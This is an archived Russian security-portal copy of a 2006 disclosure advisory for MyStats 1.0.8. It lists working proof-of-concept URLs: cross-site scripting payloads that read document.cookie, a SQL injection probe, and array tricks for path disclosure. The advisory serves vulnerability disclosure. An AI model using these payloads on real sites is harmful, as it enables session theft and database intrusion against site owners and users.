Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  SiteXpress SQL Injection

  SiteXpress SQL Injection

  [Full-disclosure] Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability

  ASPintranet SQL Injection

From:benjilenoob_(at)_hotmail.com <benjilenoob_(at)_hotmail.com>
Date:14 ноября 2006 г.
Subject:MyStats <=1.0.8 [injection sql, multiples xss, array & full path disclosure]

MyStats <=1.0.8 [injection sql, multiples xss, array & full path disclosure]
vendor site: http://emcity.nexenservices.com/mystats/index.php
product :MyStats 1.0.8
bug: injection sql, multiples xss, array & full path disclosure
risk : medium

[1/3] Connexion Variable XSS

Exploits:

mystats/mystats.php?connexion=<SCRIPT>alert(document.
cookie)</SCRIPT>&by=jour&ORDERER=datetime
mystats/mystats.php?connexion="'/><SCRIPT>alert(document.
cookie)</SCRIPT>&by=jour&ORDERER=datetime

[2/3] Details Variable Injection Sql, Full Path Disclosure, Array GET & XSS

Exploits:

mystats/mystats.php?details='
mystats/mystats.php?details[]=
mystats/mystats.php?details="'/><SCRIPT>alert(document.
cookie)</SCRIPT>

[3/3] By Array GET & XSS

Exploit:

mystats/mystats.php?by[]=admin
mystats/mystats.php?connexion=2006-11-
12&by="'/><SCRIPT>alert(document.
cookie)</SCRIPT>&by=jour&ORDERER=datetime

[[ Security Access Point ]]

Gaffie Laurent & Mosse Benjamin
http://s-a-p.ca/
http://209.190.3.234/benjamin-mosse/
contact: [email protected]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород